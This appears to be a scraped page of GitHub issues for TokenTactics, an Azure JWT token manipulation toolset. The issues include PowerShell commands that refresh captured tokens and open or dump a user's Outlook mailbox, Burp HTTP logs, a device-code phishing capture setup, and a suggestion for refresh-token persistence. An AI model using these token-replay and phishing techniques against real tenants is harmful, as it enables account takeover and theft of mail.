rvrsh3ll / tokentactics Goto Github PK
View Code? Open in Web Editor NEWAzure JWT Token Manipulation Toolset
License: BSD 3-Clause "New" or "Revised" License
Azure JWT Token Manipulation Toolset
License: BSD 3-Clause "New" or "Revised" License
I've been trying to use the Open-OWAMailboxInBrowser
command, but I can't seem to get it to work for me. Is it possible that this doesn't work in some environments? Or did something change recently that made it stop working?
RefreshTo-OutlookToken -refreshToken $refresh_token -domain example.com -Device Windows -Browser Chrome
Open-OWAMailboxInBrowser -AccessToken $OutlookToken.access_token -Resource Outlook -Device Windows -Browser Chrome
# Or
RefreshTo-SubstrateToken -refreshToken $refresh_token -domain example.com -Device Windows -Browser Chrome
Open-OWAMailboxInBrowser -AccessToken $SubstrateToken.access_token -Device Windows -Browser Chrome
Then I copy the response to a burp window with the correct target (either https://Outlook.office.com
or https://Substrate.office.com
)
GET /owa/ HTTP/2
Host: Outlook.office.com
Authorization: Bearer eyJ0eXAiOi....
or
GET /owa/ HTTP/2
Host: Substrate.office.com
Authorization: Bearer eyJ0eXAi.....
Sending this request returns the following response:
HTTP/2 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 625
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /owa/auth/errorfe.aspx?httpCode=500&msg=641346049&owaError=Microsoft.Exchange.Diagnostics.ExAssertException&owaVer=15.20.5373.17&be=DB3PR0102MB3660&ts=133006360481895636&fe=DB8PR03CA0010&reqid=77d03...28&creqid=&cid=&rt=Form15&et=DefaultPage&pal=0&dag=EURPR01DG229&forest=eurprd01.prod.exchangelabs.com&te=0&refurl=https%3a%2f%2fsubstrate.office.com%3a444%2fowa%2f&hmac=t3XkHy0wTiUvSRckM-EGWjJKvmvS3cTBx1deWVvYaNY.
Server: Microsoft-IIS/10.0
Request-Id: 77d0368c-6d53-d194-5986-ce5f9674da28
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Alt-Svc: h3=":443",h3-29=":443"
X-Calculatedfetarget: DB8PR03CU001.internal.outlook.com
X-Backendhttpstatus: 302
P3p: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ClientId=EAE9FD...; expires=Sun, 25-Jun-2023 13:07:28 GMT; path=/; secure
Set-Cookie: ClientId=EAE9FD...; expires=Sun, 25-Jun-2023 13:07:28 GMT; path=/; secure
Set-Cookie: OIDC=1; expires=Sun, 25-Dec-2022 13:07:28 GMT; path=/; secure; HttpOnly
Set-Cookie: SuiteServiceProxyKey=xoiN+gtbN...BlRA==; path=/; secure
Set-Cookie: ClientId=EAE9FD...; expires=Sun, 25-Jun-2023 13:07:28 GMT; path=/; secure
Set-Cookie: OIDC=1; expires=Sun, 25-Dec-2022 13:07:28 GMT; path=/; secure; HttpOnly
Set-Cookie: SuiteServiceProxyKey=xoiN+gtbN...BlRA==; path=/; secure
Set-Cookie: X-OWA-RedirectHistory=Agm6S...; expires=Sat, 25-Jun-2022 19:09:28 GMT; path=/; secure; HttpOnly
X-Calculatedbetarget: DB3PR0102MB3660.eurprd01.prod.exchangelabs.com
X-Backendhttpstatus: 302
X-Rum-Validated: 1
X-Content-Type-Options: nosniff
X-Besku: WCS5
X-Owa-Userid: 7484...
X-Ms-Appid: d3590ed6-52b3-4102-aeff-aad2292ab01c
Restrict-Access-Confirm: 1
X-Owa-Error: Microsoft.Exchange.Diagnostics.ExAssertException
X-Owa-Error: Microsoft.Exchange.Diagnostics.ExAssertException
X-Owa-Diagnosticsinfo: 48;3;0
X-Iids: 0
X-Backend-Begin: 2022-06-25T13:07:28.158
X-Backend-End: 2022-06-25T13:07:28.205
X-Diaginfo: DB3PR0102MB3660
X-Beserver: DB3PR0102MB3660
X-Ua-Compatible: IE=EmulateIE7
X-Proxy-Routingcorrectness: 1
X-Proxy-Backendserverstatus: 302
X-Feproxyinfo: PR0P264CA0056.FRAP264.PROD.OUTLOOK.COM
X-Feefzinfo: CDG
X-Feserver: DB8PR03CA0010
Report-To: {"group":"NelOfficeUpload1","max_age":7200,"endpoints":[{"url":"https://exo.nel.measure.office.net/api/report?TenantId=92d54...&FrontEnd=Cafe&DestinationEndpoint=CDG"}],"include_subdomains":true}
Nel: {"report_to":"NelOfficeUpload1","max_age":7200,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
X-Firsthopcafeefz: CDG
X-Feserver: PR0P264CA0056
Date: Sat, 25 Jun 2022 13:07:27 GMT
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/owa/auth/errorfe.aspx?httpCode=500&msg=641346049&owaError=Microsoft.Exchange.Diagnostics.ExAssertException&owaVer=15.20.5373.17&be=DB3PR0102MB3660&ts=133006360481895636&fe=DB8PR03CA0010&reqid=77d0368...9674da28&creqid=&cid=&rt=Form15&et=DefaultPage&pal=0&dag=EURPR01DG229&forest=eurprd01.prod.exchangelabs.com&te=0&refurl=https%3a%2f%2fsubstrate.office.com%3a444%2fowa%2f&hmac=t3XkHy0wTiUvSRckM-EGWjJKvmvS3cTBx1deWVvYaNY.">here</a>.</h2>
</body></html>
Then I right click the response to open it in the browser, open the burp proxy browser and paste the link in a new incognito window. This results in the intended HTTP 500 error page displaying "Something went wrong."
But if I refresh the page, I end up on
https://login.microsoftonline.com/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000&redirect_uri=https%3a%2f%2fsubstrate.office.com%2fowa%2f&resource=00000002-0000-0ff1-ce00-000000000000&response_mode=form_post&response_type=code+id_token&scope=openid&msafed=1&msaredir=1&client-request-id=a8a3f4...&protectedtoken=true&claims=%7b%22id_token%22%3a%7b%22xms_cc%22%3a%7b%22values%22%3a%5b%22CP1%22%5d%7d%7d%7d&nonce=...&state=...
Which is the Microsoft online login prompt requesting for an email address and password.
Checking the HTTP traffic in burp that happened when the refresh button was clicked shows the following request first:
GET /owa/auth/errorfe.aspx?httpCode=500&msg=641346049&owaError=Microsoft.Exchange.Diagnostics.ExAssertException&owaVer=15.20.5373.17&be=DB3PR0102MB3660&ts=133006362193798976&fe=DU2PR04CA0267&reqid=9dd6e6c4-90c0-0947-90c8-0bfadf6f10cb&creqid=&cid=&rt=Form15&et=DefaultPage&pal=0&dag=EURPR01DG229&forest=eurprd01.prod.exchangelabs.com&te=0&refurl=https%3a%2f%2foutlook.office.com%3a444%2fowa%2f&hmac=XHvuU5ulX5eXn2m3b3lMGHQoCEx7sFv-FLtnoZW90-k. HTTP/2
Host: substrate.office.com
Cookie: ClientId=686BA...; OIDC=1; SuiteServiceProxyKey=AyJQsSj...WEg==; X-OWA-RedirectHistory=Agm6...
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Referer: http://burpsuite/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
The response is the HTTP 500 error page:
HTTP/2 500 Internal Server Error
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 63813
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
Request-Id: 7ea042....
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Owa-Error: Microsoft.Exchange.Diagnostics.ExAssertException
X-Owa-Version: 15.20.5373.17
X-Feserver: DU2PR04CA0267
X-Beserver: DB3PR0102MB3660
X-Content-Type-Options: nosniff
X-Request-Url: https://substrate.office.com/owa/auth/errorfe.aspx?httpCode=500&msg=641346049&owaError=Microsoft.Exchange.Diagnostics.ExAssertException&owaVer=15.20.5373.17&be=DB3PR0102MB3660&ts=133006362193798976&fe=DU2PR04CA0267&reqid=9dd6e6c4-90c0-0947-90c8-0bfadf6f10cb&creqid=&cid=&rt=Form15&et=DefaultPage&pal=0&dag=EURPR01DG229&forest=eurprd01.prod.exchangelabs.com&te=0&refurl=https%3a%2f%2foutlook.office.com%3a444%2fowa%2f&hmac=XHvuU5ulX5eXn2m3b3lMGHQoCEx7sFv-FLtnoZW90-k.
X-Aspnet-Version: 4.0.30319
Set-Cookie: AriaEx=ExAssertException; expires=Sat, 25-Jun-2022 13:11:29 GMT; path=/; secure; HttpOnly
X-Feproxyinfo: PR0P264CA0062.FRAP264.PROD.OUTLOOK.COM
X-Feefzinfo: CDG
X-Powered-By: ASP.NET
Date: Sat, 25 Jun 2022 13:10:29 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- Copyright (c) 2011 Microsoft Corporation. All rights reserved. -->
<!-- OwaPage = ASP.auth_errorfe_aspx -->
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=10" />
<meta http-equiv="Content-Type" content="text/html; CHARSET=utf-8">
<title>Error</title>
...
<div class="errorHeader">500</div>
<div class="errorSubHeader">Something went wrong.</div>
<div class="errorSubHeader2"></div>
<div class="errorDetails">An unexpected error occurred and your request couldn't be handled.</div>
<div class="refreshPage">
<button class="refreshPageButton" onclick="refreshPage();">
<span class="refreshButtonText">Refresh the page</span>
</button>
</div>
...
Then, the following POST request is send:
POST /owa/plt1.ashx?off=0&PLT=now,0&msg=FormErr&cid=686BA00...8&reqid=9dd6...&fe=DU2PR04CA0267&be=DB3PR0102MB3660&cbe=&tg=&MDB=&pal=0 HTTP/2
Host: substrate.office.com
Cookie: ClientId=686BA00...; OIDC=1; SuiteServiceProxyKey=AyJQsSjL...Eg==; X-OWA-RedirectHistory=Agm6S...; AriaEx=ExAssertException
Content-Length: 53
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Content-Type: text/plain;charset=UTF-8
X-Owa-Plt-Info: &Err=Microsoft.Exchange.Diagnostics.ExAssertException
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://substrate.office.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://substrate.office.com/owa/auth/errorfe.aspx?httpCode=500&msg=641346049&owaError=Microsoft.Exchange.Diagnostics.ExAssertException&owaVer=15.20.5373.17&be=DB3PR0102MB3660&ts=133006362193798976&fe=DU2PR04CA0267&reqid=9dd6e...b&creqid=&cid=&rt=Form15&et=DefaultPage&pal=0&dag=EURPR01DG229&forest=eurprd01.prod.exchangelabs.com&te=0&refurl=https%3a%2f%2foutlook.office.com%3a444%2fowa%2f&hmac=XHvuU5ulX5eXn2m3b3lMGHQoCEx7sFv-FLtnoZW90-k.
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
&Err=Microsoft.Exchange.Diagnostics.ExAssertException
With the following response:
HTTP/2 401 Unauthorized
Server: Microsoft-IIS/10.0
Request-Id: d337b858-e681-8911-ceca-8ef206956d4c
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Alt-Svc: h3=":443",h3-29=":443"
X-Calculatedfetarget: MR1P264CU004.internal.outlook.com
X-Backendhttpstatus: 401
Set-Cookie: RoutingKeyCookie=; expires=Thu, 25-Jun-1992 13:10:32 GMT; path=/; secure
Set-Cookie: HostSwitchPrg=; expires=Thu, 25-Jun-1992 13:10:32 GMT; path=/; secure
Set-Cookie: OptInPrg=; expires=Thu, 25-Jun-1992 13:10:32 GMT; path=/; secure
Www-Authenticate: Bearer client_id="00000002-0000-0ff1-ce00-000000000000", trusted_issuers="00000001-0000-0000-c000-000000000000@*", token_types="app_asserted_user_v1 service_asserted_app_v1", authorization_uri="https://login.windows.net/common/oauth2/authorize"
X-Calculatedbetarget: MR1P264MB2929.FRAP264.PROD.OUTLOOK.COM
X-Backendhttpstatus: 401
X-Rum-Validated: 1
X-Content-Type-Options: nosniff
X-Besku: WCS6
X-Owa-Diagnosticsinfo: 0;0;0
X-Iids: 0
X-Backend-Begin: 2022-06-25T13:10:32.450
X-Backend-End: 2022-06-25T13:10:32.450
X-Diaginfo: MR1P264MB2929
X-Beserver: MR1P264MB2929
X-Ua-Compatible: IE=EmulateIE7
X-Proxy-Routingcorrectness: 1
X-Proxy-Backendserverstatus: 401
X-Feproxyinfo: PR0P264CA0062.FRAP264.PROD.OUTLOOK.COM
X-Feefzinfo: CDG
X-Feserver: MR1P264CA0085
Report-To: {"group":"NelOfficeUpload1","max_age":7200,"endpoints":[{"url":"https://exo.nel.measure.office.net/api/report?TenantId=&FrontEnd=Cafe&DestinationEndpoint=CDG"}],"include_subdomains":true}
Nel: {"report_to":"NelOfficeUpload1","max_age":7200,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
X-Firsthopcafeefz: CDG
X-Feserver: PR0P264CA0062
Date: Sat, 25 Jun 2022 13:10:32 GMT
Content-Length: 0
After that, the following request is sent:
GET / HTTP/2
Host: substrate.office.com
Cookie: ClientId=686BA...; OIDC=1; SuiteServiceProxyKey=AyJQs...WEg==; X-OWA-RedirectHistory=Agm6...; AriaEx=ExAssertException
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://burpsuite/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
With the following response:
HTTP/2 302 Found
Cache-Control: no-cache
Pragma: no-cache
Location: https://substrate.office.com/owa/
Server: Microsoft-IIS/10.0
Request-Id: a8a3e1f9-3eaa-acd4-22bc-0965ff1cd4aa
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Feserver: PR0P264CA0062
X-Requestid: a7d61ba0-e0e7-4d18-84f0-515c04a2c663
X-Feproxyinfo: PR0P264CA0062.FRAP264.PROD.OUTLOOK.COM
X-Feefzinfo: CDG
Ms-Cv: +eGjqKo+1KwivAll/xzUqg.0
X-Powered-By: ASP.NET
X-Feserver: PR0P264CA0062
Date: Sat, 25 Jun 2022 13:10:35 GMT
Content-Length: 0
After which the browser follows the redirect and requests:
GET /owa/ HTTP/2
Host: substrate.office.com
Cookie: ClientId=686BA0...; OIDC=1; SuiteServiceProxyKey=AyJQs...WEg==; X-OWA-RedirectHistory=Agm...; AriaEx=ExAssertException
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Referer: http://burpsuite/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
With the following response to redirect the browser to login.microsoft.com:
HTTP/2 302 Found
Content-Length: 784
Content-Type: text/html; charset=utf-8
Location: https://login.microsoftonline.com/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000&redirect_uri=https%3a%2f%2fsubstrate.office.com%2fowa%2f&resource=00000002-0000-0ff1-ce00-000000000000&response_mode=form_post&response_type=code+id_token&scope=openid&msafed=1&msaredir=1&client-request-id=a88b6...&protectedtoken=true&claims=%7b%22id_token%22%3a%7b%22xms_cc%22%3a%7b%22values%22%3a%5b%22CP1%22%5d%7d%7d%7d&nonce=63791759...&state=DcuxFYAwC...
Server: Microsoft-IIS/10.0
Request-Id: a88b6...
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Alt-Svc: h3=":443",h3-29=":443"
X-Calculatedfetarget: MRXP264CU001.internal.outlook.com
X-Backendhttpstatus: 302
P3p: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: RoutingKeyCookie=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.token.v1=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.token.v1=; domain=substrate.office.com; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.id_token.v1=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.code.v1=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.idp_nonce.v1=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.idp_correlation_id=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.tokenPostPath=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.id_token.v1=; domain=substrate.office.com; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.code.v1=; domain=substrate.office.com; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.idp_nonce.v1=; domain=substrate.office.com; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.idp_correlation_id=; domain=substrate.office.com; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.tokenPostPath=; domain=substrate.office.com; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.nonce.v3._mqEJL_-TPei...4=637917...789a1d65; expires=Sat, 25-Jun-2022 14:10:36 GMT; path=/;SameSite=None; secure; HttpOnly
Set-Cookie: HostSwitchPrg=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OptInPrg=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: SuiteServiceProxyKey=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: RoutingKeyCookie=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.token.v1=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.token.v1=; domain=substrate.office.com; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.id_token.v1=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.code.v1=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.idp_nonce.v1=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.idp_correlation_id=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.tokenPostPath=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.id_token.v1=; domain=substrate.office.com; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.code.v1=; domain=substrate.office.com; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.idp_nonce.v1=; domain=substrate.office.com; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.idp_correlation_id=; domain=substrate.office.com; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.tokenPostPath=; domain=substrate.office.com; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OpenIdConnect.nonce.v3._mqEJL_-TPeiEa...Iz4=637917594...d65; expires=Sat, 25-Jun-2022 14:10:36 GMT; path=/;SameSite=None; secure; HttpOnly
Set-Cookie: HostSwitchPrg=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: OptInPrg=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: SuiteServiceProxyKey=; expires=Thu, 25-Jun-1992 13:10:36 GMT; path=/; secure
Set-Cookie: X-OWA-RedirectHistory=ArLym...2gg; expires=Sat, 25-Jun-2022 19:12:36 GMT; path=/;SameSite=None; secure; HttpOnly
X-Calculatedbetarget: MRZP264MB2394.FRAP264.PROD.OUTLOOK.COM
X-Backendhttpstatus: 302
X-Rum-Validated: 1
X-Content-Type-Options: nosniff
X-Besku: WCS6
X-Owa-Diagnosticsinfo: 1;0;0
X-Iids: 0
X-Backend-Begin: 2022-06-25T13:10:36.075
X-Backend-End: 2022-06-25T13:10:36.075
X-Diaginfo: MRZP264MB2394
X-Beserver: MRZP264MB2394
X-Ua-Compatible: IE=EmulateIE7
X-Proxy-Routingcorrectness: 1
X-Proxy-Backendserverstatus: 302
X-Feproxyinfo: PR0P264CA0062.FRAP264.PROD.OUTLOOK.COM
X-Feefzinfo: CDG
X-Feserver: MRXP264CA0015
Report-To: {"group":"NelOfficeUpload1","max_age":7200,"endpoints":[{"url":"https://exo.nel.measure.office.net/api/report?TenantId=&FrontEnd=Cafe&DestinationEndpoint=CDG"}],"include_subdomains":true}
Nel: {"report_to":"NelOfficeUpload1","max_age":7200,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
X-Firsthopcafeefz: CDG
X-Feserver: PR0P264CA0062
Date: Sat, 25 Jun 2022 13:10:35 GMT
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.microsoftonline.com/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000&redirect_uri=https%3a%2f%2fsubstrate.office.com%2fowa%2f&resource=00000002-0000-0ff1-ce00-000000000000&response_mode=form_post&response_type=code+id_token&scope=openid&msafed=1&msaredir=1&client-request-id=a88b6...401e&protectedtoken=true&claims=%7b%22id_token%22%3a%7b%22xms_cc%22%3a%7b%22values%22%3a%5b%22CP1%22%5d%7d%7d%7d&nonce=63791...a1d65&state=DcuxF...36g8">here</a>.</h2>
</body></html>
There is nothing wrong with the access or refresh tokens as any other technique does seem to work without any issues.
For example:
RefreshTo-MSGraphToken -refreshToken $refresh_token -domain example.com -Device Windows -Browser Chrome
Dump-OWAMailboxViaMSGraphApi -AccessToken $MSGraphToken.access_token -mailFolder inbox -top 5 -Device Windows -Browser Chrome
This shows me the last 5 mails from the user's mailbox without problems.
P.S. very nice tool by the way!
Hi,
Are you aware of scenarios where it's not possible to capture via the dynamic device code phishing technique ? I've setup everything and tested it using an Office365 account I have - token was captured correctly. I then tried it again with an org Office365 account but it's not capture properly.. Any ideas ?
I was hoping you could enlighten me on the whole process - as I'm a bit confused and I'm trying to troubleshoot why some tokens are not captured.
The device code that gets displayed to the target user (using the 'Azure-App-Tools' template) is different from the code that gets generated by capturetokenphish.ps1 on the Azure server (tailing nohup.out). Is that normal ? I would have thought it’s meant to be the same.
Looking at the workflow - it first grabs the code from Microsoft directly (this is where the CORS anywhere server comes in handy), then use the returned response to populate the page that’s displayed to the user (data.message).
Then it sends the verification code to https://..cloudapp.azure.com/?id=, which was deployed using deploycaptureserver.ps1. At the end, I'm not sure what capturetokenphish.ps1 does with this.
However, when I manually send the verification code to the cloudapp host, the user/device code shown in nohup.out doesn’t map to what was provided by Microsoft initially.
When executing Invoke-DumpOWAMailboxViaMSGraphApi
getting:
Forge-UserAgent : The term 'Forge-UserAgent' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At C:\Users\me\OneDrive\Pulpit\device_code\TokenTactics\modules\OutlookEmailAbuse.ps1:108 char:30
+ $UserAgent = Forge-UserAgent -Device $Device
+ ~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Forge-UserAgent:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
Invoke-RestMethod : Object reference not set to an instance of an object.
At C:\Users\me\OneDrive\Pulpit\device_code\TokenTactics\modules\OutlookEmailAbuse.ps1:133 char:21
+ ... $response = Invoke-RestMethod -Uri $url -ContentType "application/jso ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Invoke-RestMethod], NullReferenceException
+ FullyQualifiedErrorId : System.NullReferenceException,Microsoft.PowerShell.Commands.InvokeRestMethodCommand
I wonder if something like “RefreshTo-Refresh” function would be viable? (thus offering a way of persistence by using a refresh token to issue a new refresh token)
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.